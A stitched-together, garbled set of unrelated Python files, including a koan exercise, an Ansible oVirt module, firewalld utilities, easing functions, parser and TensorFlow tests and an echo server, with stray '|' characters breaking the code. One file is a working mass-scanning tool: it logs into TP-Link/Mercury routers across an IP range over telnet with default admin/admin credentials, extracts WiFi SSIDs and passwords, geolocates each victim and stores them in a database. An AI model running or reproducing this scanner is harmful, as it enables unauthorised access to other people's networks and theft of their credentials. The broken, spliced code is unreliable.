#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Partially based on AboutMethods in the Ruby Koans
#
from runner.koan import *
def my_global_function(a, b):
return a + b
class AboutMethods(Koan):
def test_calling_a_global_function(self):
self.assertEqual(5, my_global_function(2, 3))
# NOTE: Wrong number of arguments is not a SYNTAX error, but a
# runtime error.
def test_calling_functions_with_wrong_number_of_arguments(self):
try:
my_global_function()
except Exception as exception:
# NOTE: The .__name__ attribute will convert the class
# into a string value.
self.assertEqual(exception.__class__.__name__,
exception.__class__.__name__)
self.assertMatch(
r'my_global_function\(\) takes exactly 2 arguments \(0 given\)',
| exception[0])
try:
my_global_function(1, 2, 3)
except Exception as e:
# Note, | watch out for parenthesis. They need slashes in front!
self.assertMatch(r'my_global_function\(\) takes exactly 2 arguments \(3 given\)', e[0])
# ------------------------------------------------------------------
def pointless_method(self, a, b):
sum = a + b
def test_which_does_not_return_anything(self):
self.assertEqual(None, self.pointless_method(1, 2))
# Notice that methods accessed from class scope do not require
# you to pass the first "self" argument?
# ------------------------------------------------------------------
def method_with_defaults(self, a, b='default_value'):
return [a, b]
def test_calling_with_default_values(self):
self.assertEqual([1, 'default_value'], self.method_with_defaults(1))
self.assertEqual([1, 2], self.method_with_defaults(1, 2))
# ------------------------------------------------------------------
def method_with_var_args(self, *args):
return args
def test_calling_with_variable_arguments(self):
self.assertEqual((), self.method_with_var_args())
self.assertEqual(('one', ), self.method_with_var_args('one'))
self.assertEqual(('one', 'two'), self.method_with_var_args('one', 'two'))
# ------------------------------------------------------------------
def function_with_the_same_name(self, a, b):
return a + b
def test_functions_without_self_arg_are_global_functions(self):
def function_with_the_same_name(a, b):
return a * b
self.assertEqual(12, function_with_the_same_name(3, 4))
def test_calling_methods_in_same_class_with_explicit_receiver(self):
def function_with_the_same_name(a, b):
return a * b
self.assertEqual(7, self.function_with_the_same_name(3, 4))
# ------------------------------------------------------------------
def another_method_with_the_same_name(self):
return 10
link_to_overlapped_method = another_method_with_the_same_name
def another_method_with_the_same_name(self):
return 42
def test_that_old_methods_are_hidden_by_redefinitions(self):
self.assertEqual(42, self.another_method_with_the_same_name())
def test_that_overlapped_method_is_still_there(self):
self.assertEqual(10, self.link_to_overlapped_method())
# ------------------------------------------------------------------
def empty_method(self):
pass
def test_methods_that_do_nothing_need_to_use_pass_as_a_filler(self):
self.assertEqual(None, self.empty_method())
def test_pass_does_nothing_at_all(self):
"You"
"shall"
"not"
pass
self.assertEqual(True, "Still got to this line" != None)
# ------------------------------------------------------------------
def one_line_method(self): return 'Madagascar'
def test_no_indentation_required_for_one_line_statement_bodies(self):
self.assertEqual('Madagascar', self.one_line_method())
# ------------------------------------------------------------------
def method_with_documentation(self):
"A string placed at the beginning of a function is used for documentation"
return "ok"
def test_the_documentation_can_be_viewed_with_the_doc_method(self):
self.assertMatch("A string placed at the beginning of a function is used for documentation", self.method_with_documentation.__doc__)
# ------------------------------------------------------------------
class Dog(object):
def name(self):
return "Fido"
def _tail(self):
# Prefixing a method with an underscore implies private scope
return "wagging"
def __password(self):
return 'password' # Genius!
def test_calling_methods_in_other_objects(self):
rover = self.Dog()
self.assertEqual('Fido', rover.name())
def test_private_access_is_implied_but_not_enforced(self):
rover = self.Dog()
# This is a little rude, but legal
self.assertEqual('wagging', rover._tail())
def test_double_underscore_attribute_prefixes_cause_name_mangling(self):
"""Attributes names that start with a double underscore get
mangled when an instance is created."""
rover = self.Dog()
try:
#This may not be possible...
password = rover.__password()
except Exception as ex:
self.assertEqual('AttributeError', ex.__class__.__name__)
# But this still is!
self.assertEqual('password', rover._Dog__password())
# Name mangling exists to avoid name clash issues when subclassing.
# It is not for providing effective access protection
|
d a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_permissions
short_description: "Module to manage permissions of users/groups in oVirt/RHV"
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage permissions of users/groups in oVirt/RHV"
options:
role:
description:
- "Name of the role to be assigned to user/group on specific object."
default: UserRole
state:
description:
- "Should the permission be present/absent."
choices: ['present', 'absent']
default: present
object_id:
description:
- "ID of the object where the permissions should be managed."
object_name:
description:
- "Name of the object where the permissions should be managed."
object_type:
description:
- "The object where the permissions should be managed."
default: 'vm'
choices: [
'data_center',
'cluster',
'host',
'storage_domain',
'network',
'disk',
'vm',
'vm_pool',
'template',
'cpu_profile',
'disk_profile',
'vnic_profile',
'system',
]
user_name:
description:
- "Username of the user to manage. In most LDAPs it's I(uid) of the user,
but in Active Directory you must specify I(UPN) of the user."
- "Note that if user don't exist in the system this module will fail,
you should ensure the user exists by using M(ovirt_users) module."
group_name:
description:
- "Name of the group to manage."
- "Note that if group don't exist in the system this module will fail,
you should ensure the group exists by using M(ovirt_groups) module."
authz_name:
description:
- "Authorization provider of the user/group. In previous versions of oVirt/RHV known as domain."
required: true
aliases: ['domain']
namespace:
description:
- "Namespace of the authorization provider, where user/group resides."
required: false
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Add user user1 from authorization provider example.com-authz
- ovirt_permissions:
user_name: user1
authz_name: example.com-authz
object_type: vm
object_name: myvm
role: UserVmManager
# Remove permission from user
- ovirt_permissions:
state: absent
user_name: user1
authz_name: example.com-authz
object_type: cluster
object_name: mycluster
role: ClusterAdmin
'''
RETURN = '''
id:
description: ID of the permission which is managed
returned: On success if permission is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
permission:
description: "Dictionary of all the permission attributes. Permission attributes can be found on your oVirt/RHV instance
at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/permission."
returned: On success if permission is found.
type: dict
'''
try:
import ovirtsdk4.types as otypes
except ImportError:
pass
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_sdk,
create_connection,
equal,
follow_link,
get_link_name,
ovirt_full_argument_spec,
search_by_attributes,
search_by_name,
)
def _objects_service(connection, object_type):
if object_type == 'system':
return connection.system_service()
return getattr(
connection.system_service(),
'%ss_service' % object_type,
None,
)()
def _object_service(connection, module):
object_type = module.params['object_type']
objects_service = _objects_service(connection, object_type)
if object_type == 'system':
return objects_service
object_id = module.params['object_id']
if object_id is None:
sdk_object = search_by_name(objects_service, module.params['object_name'])
if sdk_object is None:
raise Exception(
"'%s' object '%s' was not found." % (
module.params['object_type'],
module.params['object_name']
)
)
object_id = sdk_object.id
return objects_service.service(object_id)
def _permission(module, permissions_service, connection):
for permission in permissions_service.list():
user = follow_link(connection, permission.user)
if (
equal(module.params['user_name'], user.principal if user else None) and
equal(module.params['group_name'], get_link_name(connection, permission.group)) and
equal(module.params['role'], get_link_name(connection, permission.role))
):
return permission
class PermissionsModule(BaseModule):
def _user(self):
user = search_by_attributes(
self._connection.system_service().users_service(),
usrname="{name}@{authz_name}".format(
name=self._module.params['user_name'],
authz_name=self._module.params['authz_name'],
),
)
if user is None:
raise Exception("User '%s' was not found." % self._module.params['user_name'])
return user
def _group(self):
groups = self._connection.system_service().groups_service().list(
search="name={name}".format(
name=self._module.params['group_name'],
)
)
# If found more groups, filter them by namespace and authz name:
# (filtering here, as oVirt/RHV backend doesn't support it)
if len(groups) > 1:
groups = [
g for g in groups if (
equal(self._module.params['namespace'], g.namespace) and
equal(self._module.params['authz_name'], g.domain.name)
)
]
if not groups:
raise Exception("Group '%s' was not found." % self._module.params['group_name'])
return groups[0]
def build_entity(self):
entity = self._group() if self._module.params['group_name'] else self._user()
return otypes.Permission(
user=otypes.User(
id=entity.id
) if self._module.params['user_name'] else None,
group=otypes.Group(
id=entity.id
) if self._module.params['group_name'] else None,
role=otypes.Role(
name=self._module.params['role']
),
)
def main():
argument_spec = ovirt_full_argument_spec(
state=dict(
choices=['present', 'absent'],
default='present',
),
role=dict(default='UserRole'),
object_type=dict(
default='vm',
choices=[
'data_center',
'cluster',
'host',
'storage_domain',
'network',
'disk',
'vm',
'vm_pool',
'template',
'cpu_profile',
'disk_pro | file',
'vnic_profile',
'system',
]
),
authz_name=dict(required=True, aliases=['domain']),
object_id=dict(default=None),
object_name=dict(default=None),
user_name=dict(rdefault=None),
| group_name=dict(default=None),
namespace=dict(default=None),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
check_sdk(module)
if (
|
#!/usr/bin/env python
# coding=utf-8
# code by kbdancer@92ez.com
from threading import Thread
from telnetlib import Telnet
import requests
import sqlite3
import queue
import time
import sys
import os
def ip2num(ip):
ip = [int(x) for x in ip.split('.')]
return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]
def num2ip(num):
return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)
def ip_range(start, end):
return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]
class Database:
db = sys.path[0] + "/TPLINK_KEY.db"
charset = 'utf8'
def __init__(self):
self.connection = sqlite3.connect(self.db)
self.connection.text_factory = str
self.cursor = self.connection.cursor()
def insert(self, query, params):
try:
self.cursor.execute(query, params)
self.connection.commit()
except Exception as e:
print(e)
self.connection.rollback()
def update(self, query, params):
try:
self.cursor.execute(query, params)
self.connection.commit()
except Exception as e:
print(e)
self.connection.rollback()
def query(self, query, params):
cursor = self.connection.cursor()
cursor.execute(query, params)
return cursor.fetchall()
def __del__(self):
self.connection.close()
def b_thread(ip_address_list):
thread_list = []
queue_list = queue.Queue()
hosts = ip_address_list
for host in hosts:
queue_list.put(host)
for x in range(0, int(sys.argv[1])):
thread_list.append(tThread(queue_list))
for t in thread_list:
try:
t.daemon = True
t.start()
except Exception as e:
print(e)
for t in thread_list:
t.join()
class tThread(Thread):
def __init__(self, queue_obj):
Thread.__init__(self)
self.queue = queue_obj
def run(self):
while not self.queue.empty():
host = self.queue.get()
try:
get_info(host)
except Exception as e:
print(e)
continue
def get_position_by_ip(host):
try:
ip_url = "http://ip-api.com/json/{ip}?lang=zh-CN".format(ip=host)
header = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"}
json_data = requests.get(url=ip_url, headers=header, timeout=10).json()
info = [json_data.get("country"), json_data.get('regionName'), json_data.get('city'), json_data.get('isp')]
return info
except Exception as e:
print(e)
def get_info(host):
username = "admin"
password = "admin"
telnet_timeout = 15
cmd_timeout = 5
try:
t = Telnet(host, timeout=telnet_timeout)
t.read_until("username:", cmd_timeout)
t.write(username + "\n")
t.read_until("password:", cmd_timeout)
t.write(password + "\n")
t.write("wlctl show\n")
t.read_until("SSID", cmd_timeout)
wifi_str = t.read_very_eager()
t.write("lan show info\n")
t.read_until("MACAddress", cmd_timeout)
lan_str = t.read_very_eager()
t.close()
if len(wifi_str) > 0:
# clear extra space
wifi_str = "".join(wifi_str.split())
wifi_str = wifi_str
# get SID KEY MAC
wifi_ssid = wifi_str[1:wifi_str.find('QSS')]
wifi_key = wifi_str[wifi_str.find('Key=') + 4:wifi_str.find('cmd')] if wifi_str.find('Key=') != -1 else '无密码'
router_mac = lan_str[1:lan_str.find('__')].replace('\r\n', '')
current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))
try:
my_sqlite_db = Database()
query_info = """select * from scanlog where ssid=? and key=? and | mac=?"""
query_result = my_sqlite_db.query(query_info, [wifi_ssid, wifi_key, router_mac])
if len(query_result | ) < 1:
position_data = get_position_by_ip(host)
country = position_data[0]
province = position_data[1]
city = position_data[2]
isp = position_data[3]
insert_info = """INSERT INTO scanlog (`host`,`mac`,`ssid`,`wifikey`,`country`,`province`,`city`,`isp`) VALUES (?,?,?,?,?,?,?,?)"""
my_sqlite_db.insert(insert_info, [host, router_mac, wifi_ssid, wifi_key, country, province, city, isp])
print('[√] [%s] Info %s %s %s => Inserted!' % (current_time, host, wifi_ssid, wifi_key))
else:
print('[x] [%s] Found %s %s %s in DB, do nothing!' % (current_time, host, wifi_ssid, wifi_key))
except Exception as e:
print(e)
except Exception as e:
pass
if __name__ == '__main__':
print('==========================================')
print(' Scan TPLINK(MERCURY) wifi key by telnet')
print(' Author 92ez.com')
print('==========================================')
begin_ip = sys.argv[2].split('-')[0]
end_ip = sys.argv[2].split('-')[1]
ip_list = ip_range(begin_ip, end_ip)
current_pid = os.getpid()
print('\n[*] Total %d IP...' % len(ip_list))
print('\n================ Running =================')
try:
b_thread(ip_list)
except KeyboardInterrupt:
print('\n[*] Kill all thread.')
os.kill(current_pid, 9)
|
# "<port-id>" case
if isinstance(ports, int) or ports.isdigit():
| id1 = getPortID(ports)
if id1 >= 0:
return (id1,)
return id1
splits = ports.split("-")
# "<port-id>-<port-id>" case
if len(splits) == 2 and splits[0].isdigit() and splits[1].isdigit():
id1 = getPortID(splits[0])
id2 = getPortID(splits[1])
if id1 >= 0 and id2 >= 0:
if id1 < id2:
return (id1, id2)
elif id1 > id2:
return | (id2, id1)
else: # ids are the same
return (id1,)
# everything else "<port-str>[-<port-str>]"
matched = [ ]
for i in range(len(splits), 0, -1):
id1 = getPortID("-".join(splits[:i]))
port2 = "-".join(splits[i:])
if len(port2) > 0:
id2 = getPortID(port2)
if id1 >= 0 and id2 >= 0:
if id1 < id2:
matched.append((id1, id2))
elif id1 > id2:
matched.append((id2, id1))
else:
matched.append((id1, ))
else:
if id1 >= 0:
matched.append((id1,))
if i == len(splits):
# full match, stop here
break
if len(matched) < 1:
return -1
elif len(matched) > 1:
return None
return matched[0]
def portStr(port, delimiter=":"):
""" Create port and port range string
@param port port or port range int or [int, int]
@param delimiter of the output string for port ranges, default ':'
@return Port or port range string, empty string if port isn't specified, None if port or port range is not valid
"""
if port == "":
return ""
_range = getPortRange(port)
if isinstance(_range, int) and _range < 0:
return None
elif len(_range) == 1:
return "%s" % _range
else:
return "%s%s%s" % (_range[0], delimiter, _range[1])
def portInPortRange(port, range):
_port = getPortID(port)
_range = getPortRange(range)
if len(_range) == 1:
return _port == getPortID(_range[0])
if len(_range) == 2 and \
_port >= getPortID(_range[0]) and _port <= getPortID(_range[1]):
return True
return False
def getServiceName(port, proto):
""" Check and Get service name from port and proto string combination using socket.getservbyport
@param port string or id
@param protocol string
@return Service name if port and protocol are valid, else None
"""
try:
name = socket.getservbyport(int(port), proto)
except socket.error:
return None
return name
def checkIP(ip):
""" Check IPv4 address.
@param ip address string
@return True if address is valid, else False
"""
try:
socket.inet_pton(socket.AF_INET, ip)
except socket.error:
return False
return True
def checkIP6(ip):
""" Check IPv6 address.
@param ip address string
@return True if address is valid, else False
"""
try:
socket.inet_pton(socket.AF_INET6, ip)
except socket.error:
return False
return True
def checkIPnMask(ip):
if "/" in ip:
addr = ip[:ip.index("/")]
mask = ip[ip.index("/")+1:]
if len(addr) < 1 or len(mask) < 1:
return False
else:
addr = ip
mask = None
if not checkIP(addr):
return False
if mask:
if "." in mask:
return checkIP(mask)
else:
try:
i = int(mask)
except ValueError:
return False
if i < 0 or i > 32:
return False
return True
def checkIP6nMask(ip):
if "/" in ip:
addr = ip[:ip.index("/")]
mask = ip[ip.index("/")+1:]
if len(addr) < 1 or len(mask) < 1:
return False
else:
addr = ip
mask = None
if not checkIP6(addr):
return False
if mask:
try:
i = int(mask)
except ValueError:
return False
if i < 0 or i > 128:
return False
return True
def checkProtocol(protocol):
try:
i = int(protocol)
except ValueError:
# string
try:
socket.getprotobyname(protocol)
except socket.error:
return False
else:
if i < 0 or i > 255:
return False
return True
def checkInterface(iface):
""" Check interface string
@param interface string
@return True if interface is valid (maximum 16 chars and does not contain ' ', '/', '!', ':', '*'), else False
"""
if not iface or len(iface) > 16:
return False
for ch in [ ' ', '/', '!', '*' ]:
# !:* are limits for iptables <= 1.4.5
if ch in iface:
return False
# disabled old iptables check
#if iface == "+":
# # limit for iptables <= 1.4.5
# return False
return True
def checkUINT32(val):
try:
x = int(val, 0)
except ValueError:
return False
else:
if x >= 0 and x <= 4294967295:
return True
return False
def firewalld_is_active():
""" Check if firewalld is active
@return True if there is a firewalld pid file and the pid is used by firewalld
"""
if not os.path.exists(FIREWALLD_PIDFILE):
return False
try:
with open(FIREWALLD_PIDFILE, "r") as fd:
pid = fd.readline()
except Exception:
return False
if not os.path.exists("/proc/%s" % pid):
return False
try:
with open("/proc/%s/cmdline" % pid, "r") as fd:
cmdline = fd.readline()
except Exception:
return False
if "firewalld" in cmdline:
return True
return False
def tempFile():
try:
if not os.path.exists(FIREWALLD_TEMPDIR):
os.mkdir(FIREWALLD_TEMPDIR, 0o750)
return tempfile.NamedTemporaryFile(mode='wt', prefix="temp.",
dir=FIREWALLD_TEMPDIR, delete=False)
except Exception as msg:
log.error("Failed to create temporary file: %s" % msg)
raise
return None
def readfile(filename):
try:
with open(filename, "r") as f:
return f.readlines()
except Exception as e:
log.error('Failed to read file "%s": %s' % (filename, e))
return None
def writefile(filename, line):
try:
with open(filename, "w") as f:
f.write(line)
except Exception as e:
log.error('Failed to write to file "%s": %s' % (filename, e))
return False
return True
def enable_ip_forwarding(ipv):
if ipv == "ipv4":
return writefile("/proc/sys/net/ipv4/ip_forward", "1\n")
elif ipv == "ipv6":
return writefile("/proc/sys/net/ipv6/conf/all/forwarding", "1\n")
return False
def get_modinfos(path_templates, prefix):
kver = os.uname()[2]
modules = []
for path in (t % kver for t in path_templates):
if os.path.isdir(path):
for filename in sorted(os.listdir(path)):
if filename.startswith(prefix):
modules.append(filename.split(".")[0])
if modules:
# Ignore status as it is not 0 if even one module had problems
(status, ret) = runProg(COMMANDS["modinfo"], modules)
entry = {}
for m in re.finditer(r"^(\w+):[ \t]*(\S.*?)[ \t]*$", ret, re.MULTILINE):
key, value = m.groups()
# Assume every entry starts with filename
if key == "filename" and "filename" in entry:
yield entry
entry = {}
entry.setdefault(key, [ ]).append(value)
if "filename" in entry:
yield entry
def get_nf_conntrack_helpers():
helpers = { }
for modinfo in get_modinfos(["/lib/modules/%s/kernel/net/netfilter/"], "nf_conntrack_"):
filename = modinfo['filename'][0].split("/")[-1]
name = filename.split(".")[0]
# If module name matches "nf_conntrack_proto_*"
# the we add it to helpers list |
import math
def OUT_CIRC(t, b, c, d):
t = float(t)
b = float(b)
c = float(c)
d = float(d)
t = t / d - 1
return c * math.sqrt(1 - t * t) + b
def OUT_QUART(t, b, c, d):
t = float(t)
b = float(b)
c = float(c)
d = float(d)
t = t / d - 1
return -c * (t * t * t * t - 1) + b
def INOUT_CIRC(t, b, c, d):
t = float(t)
b = float(b)
c = float(c)
d = float(d)
t1 = t / (d / 2)
if (t / (d / 2)) < 1:
return -c / 2 * (math.sqrt(1 - (t / (d / 2)) ** 2) - 1) + b
else:
return c / 2 * (math.sqrt(1 - (t1 - 2) ** 2) + 1) + b
def IN_CUBIC(t, b, c, d):
t = float(t)
b = float(b)
c = float(c)
d = float(d)
t /= d
return c * t * t * t + b
def OUT_QUAD(t, b, c, d):
t = float(t)
b = float(b)
c = float(c)
d = float(d)
t /= d
return -c * t * (t - 2) + b
def OUT_BOUNCE(t, b, c, d):
t = float(t)
b = float(b)
c = float(c)
d = float(d)
t /= d
if t < (1 / 2.75):
return c * (7.5625 * t * t) + b
elif t < (2 / 2.75):
t -= (1.5 / 2.75)
return c * (7.5625 * t * t | + .75) + b
elif t < (2.5 / 2.75):
t -= (2.25 / 2.75)
return c * (7.5625 * t * t + .9375) + b
else:
t -= (2.625 / 2.75)
return | c * (7.5625 * t * t + .984375) + b
def INOUT_EXP(t, b, c, d):
t = float(t)
b = float(b)
c = float(c)
d = float(d)
t1 = t / (d / 2)
if t == 0:
return b
elif t == d:
return b + c
elif t1 < 1:
return c / 2 * math.pow(2, 10 * (t1 - 1)) + b - c * 0.0005
else:
return c / 2 * 1.0005 * (-math.pow(2, -10 * (t1 - 1)) + 2) + b
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Microsoft Internet Explorer WebCache database."""
import unittest
from plaso.lib import definitions
from plaso.parsers.esedb_plugins import msie_webcache
from tests.parsers.esedb_plugins import test_lib
class MsieWebCacheESEDBPluginTest(test_lib.ESEDBPluginTestCase):
"""Tests for the MSIE WebCache ESE database plugin."""
# pylint: disable=protected-access
def testConvertHeadersValues(self):
"""Tests the _ConvertHeadersValues function."""
plugin = msie_webcache.MsieWebCacheESEDBPlugin()
binary_value = (
b'HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n'
b'X-Content-Type-Options: nosniff\r\nContent-Length: 2759\r\n'
b'X-XSS-Protection: 1; mode=block\r\n'
b'Alternate-Protocol: 80:quic\r\n\r\n')
expected_headers_value = (
'[HTTP/1.1 200 OK; Content-Type: image/png; '
'X-Content-Type-Options: nosniff; Content-Length: 2759; '
'X-XSS-Protection: 1; mode=block; '
'Alternate-Protocol: 80:quic]')
headers_value = plugin._ConvertHeadersValues(binary_value)
self.assertEqual(headers_value, expected_headers_value)
def testProcessOnDatabaseWithPartitionsTable(self):
"""Tests the Process function on database with a Partitions table."""
plugin = msie_webcache.MsieWebCacheESEDBPlugin()
storage_writer = self._ParseESEDBFileWithPlugin(['WebCacheV01.dat'], plugin)
self.assertEqual(storage_writer.number_of_events, 1354)
self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
# The order in which ESEDBPlugin._GetRecordValues() generates events is
# nondeterministic hence we sort the events.
events = list(storage_writer.GetSortedEvents())
expected_event_values = {
'container_identifier': 1,
'data_type': 'msie:webcache:containers',
'date_time': '2014-05-12 07:30:25.4861987',
'directory': (
'C:\\Users\\test\\AppData\\Local\\Microsoft\\Windows\\'
'INetCache\\IE\\'),
'name': 'Content',
'set_identifier': 0,
'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_ACCESS}
self.CheckEventValues(storage_writer, events[567], expected_ev | ent_values)
def testProcessOnDatabaseWithPartitionsExTable(self):
"""Tests the Process function on database with a PartitionsEx table."""
plugi | n = msie_webcache.MsieWebCacheESEDBPlugin()
storage_writer = self._ParseESEDBFileWithPlugin(
['PartitionsEx-WebCacheV01.dat'], plugin)
self.assertEqual(storage_writer.number_of_events, 4014)
self.assertEqual(storage_writer.number_of_extraction_warnings, 3)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
# The order in which ESEDBPlugin._GetRecordValues() generates events is
# nondeterministic hence we sort the events.
events = list(storage_writer.GetSortedEvents())
expected_event_values = {
'access_count': 5,
'cache_identifier': 0,
'cached_file_size': 726,
'cached_filename': 'b83d57c0[1].svg',
'container_identifier': 14,
'data_type': 'msie:webcache:container',
'date_time': '2019-03-20 17:22:14.0000000',
'entry_identifier': 63,
'sync_count': 0,
'response_headers': (
'[HTTP/1.1 200; content-length: 726; content-type: image/svg+xml; '
'x-cache: TCP_HIT; x-msedge-ref: Ref A: 3CD5FCBC8EAD4E0A80FA41A62'
'FBC8CCC Ref B: PRAEDGE0910 Ref C: 2019-12-16T20:55:28Z; date: '
'Mon, 16 Dec 2019 20:55:28 GMT]'),
'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
'url': 'https://www.bing.com/rs/3R/kD/ic/878ca0cd/b83d57c0.svg'}
self.CheckEventValues(storage_writer, events[100], expected_event_values)
if __name__ == '__main__':
unittest.main()
|
rifies that the restore is successful.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
break_point: Break point. Optional. Defaults to num_outputs/2.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
break_point = num_outputs // 2 if not break_point else break_point
# Skip `break_point` items and store the remaining produced from ds_fn
# in `expected`.
self.gen_outputs(
ds_fn, [],
break_point,
sparse_tensors=sparse_tensors,
verify_exhausted=False)
expected = self.gen_outputs(
ds_fn, [],
num_outputs - break_point,
ckpt_saved=True,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
# Generate `break_point` items from ds_fn and save checkpoint.
self.gen_outputs(
ds_fn, [],
break_point,
sparse_tensors=sparse_tensors,
verify_exhausted=False)
actual = []
# Build an empty graph but load checkpoint for ds_fn.
with ops.Graph().as_default() as g:
get_next_op, saver = self._build_empty_graph(
ds_fn, sparse_tensors=sparse_tensors)
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
self._restore(saver, sess)
for _ in range(num_outputs - break_point):
actual.append(sess.run(get_next_op))
if verify_exhausted:
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next_op)
self.match(expected, actual)
def verify_error_on_save(self,
ds_fn,
num_outputs,
error,
break_point=None,
sparse_tensors=False):
"""Attempts to save a non-saveable iterator.
Args:
ds_fn: See `run_core_tests`.
num_outputs: See `run_core_tests`.
error: Declared error when trying to save iterator.
break_point: Break point. Optional. Defaults to num_outputs/2.
sparse_tensors: See `run_core_tests`.
Raises:
AssertionError if any test fails.
"""
break_point = num_outputs // 2 if not break_point else break_point
with ops.Graph().as_default() as g:
init_op, get_next_op, saver = self._build_graph(
ds_fn, sparse_tensors=sparse_tensors)
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
self._initialize(init_op, sess)
for _ in range(break_point):
sess.run(get_next_op)
with self.assertRaises(error):
self._save(sess, saver)
def verify_run_with_breaks(self,
ds_fn,
break_points,
num_outputs,
init_before_restore=False,
sparse_tensors=False,
verify_exhausted=True):
"""Verifies that ds_fn() produces the same outputs with and without breaks.
1. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
*without* stopping at break points.
2. Builds a Dataset using `ds_fn` and produces `num_outputs` items from it
with stopping at break points.
Deep matches outputs from 1 and 2.
Args:
ds_fn: See `gen_outputs`.
break_points: See `gen_outputs`.
num_outputs: See `gen_outputs`.
init_before_restore: See `gen_outputs`.
sparse_tensors: See `run_core_tests`.
verify_exhausted: See `gen_outputs`.
Raises:
AssertionError if any test fails.
"""
expected = self.gen_outputs(
ds_fn, [],
num_outputs,
init_before_restore=init_before_restore,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
actual = self.gen_outputs(
ds_fn,
break_points,
num_outputs,
init_before_restore=init_before_restore,
sparse_tensors=sparse_tensors,
verify_exhausted=verify_exhausted)
self.match(expected, actual)
def gen_outputs(self,
ds_fn,
break_points,
num_outputs,
ckpt_saved=False,
init_before_restore=False,
sparse_tensors=False,
verify_exhausted=True,
save_checkpoint_at_end=True):
"""Generates elements from input dataset while stopping at break points.
Produces `num_outputs` outputs and saves the state of the iterator in the |
Saver checkpoint.
Args:
ds_fn: | 0-argument function that returns the dataset.
break_points: A list of integers. For each `break_point` in
`break_points`, we produce outputs till `break_point` number of items
have been produced and then checkpoint the state. The current graph
and session are destroyed and a new graph and session are used to
produce outputs till next checkpoint or till `num_outputs` elements
have been produced. `break_point` must be <= `num_outputs`.
num_outputs: The total number of outputs to produce from the iterator.
ckpt_saved: Whether a checkpoint already exists. If False, we build the
graph from ds_fn.
init_before_restore: Whether init should be called before saver.restore.
This is just so that we can verify that restoring an already initialized
iterator works.
sparse_tensors: Whether dataset is built from SparseTensor(s).
verify_exhausted: Whether to verify that the iterator has been exhausted
after producing `num_outputs` elements.
save_checkpoint_at_end: Whether to save a checkpoint after producing all
outputs. If False, checkpoints are saved each break point but not at the
end. Note that checkpoints overwrite each other so there is always only
a single checkpoint available. Defaults to True.
Returns:
A list of `num_outputs` items.
"""
outputs = []
def get_ops():
if ckpt_saved:
saver = self._import_meta_graph()
init_op, get_next_op = self._get_iterator_ops_from_collection(
ds_fn, sparse_tensors=sparse_tensors)
else:
init_op, get_next_op, saver = self._build_graph(
ds_fn, sparse_tensors=sparse_tensors)
return init_op, get_next_op, saver
for i in range(len(break_points) + 1):
with ops.Graph().as_default() as g:
init_op, get_next_op, saver = get_ops()
get_next_op = remove_variants(get_next_op)
with self.session(graph=g) as sess:
if ckpt_saved:
if init_before_restore:
self._initialize(init_op, sess)
self._restore(saver, sess)
else:
self._initialize(init_op, sess)
start = break_points[i - 1] if i > 0 else 0
end = break_points[i] if i < len(break_points) else num_outputs
num_iters = end - start
for _ in range(num_iters):
outputs.append(sess.run(get_next_op))
if i == len(break_points) and verify_exhausted:
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next_op)
if save_checkpoint_at_end or i < len(break_points):
self._save(sess, saver)
ckpt_saved = True
return outputs
def match(self, expected, actual):
"""Matches nested structures.
Recursively matches shape and values of `expected` and `actual`.
Handles scalars, numpy arrays and other python sequence containers
e.g. list, dict.
Args:
expected: Nested structure 1.
actual: Nested structure 2.
Raises:
AssertionError if matching fails.
"""
if isinstance(expected, np.ndarray):
expected = expected.tolist()
if isinstance(actual, np.ndarray):
actual = actual.tolist()
self.assertEqual(type(expected), type(actual))
if nest.is_sequence(expected):
self.assertEqual(len(expected), len(actual))
if isinstance(expected, dict):
for k |
f | rom flappy.display3d.vertexbuffer3d import VertexBuffer3D, VertexBuffer3DFormat
from flappy.display3d.indexbuffer3d import IndexBuffer3D
from flappy.display3d.program3d import Program3D
from flappy.display3d.texture import Texture
from flappy.display3d.scene3d import Scene3D
| |
import asyncio
import logging
import concurrent.futures
class EchoServer(object):
"""Echo server class"""
def __init__(self, host, port, loop=None):
self._loop = loop or asyncio.get_event_loop()
self._server = asyncio.start_server(self.handle_connection, host=host, port=port)
def start(self, and_loop=True):
self._server = self._loop.run_until_complete(self._server)
logging.info('Listening established on {0}'.format(self._server.sockets[0].getsockname()))
if and_loop:
self._loop.run_forever()
def stop(self, and_loop=True):
self._server.close()
if and_loop:
self._loop.close()
@asyncio.coroutine
def handle_connection(self, reader | , writer):
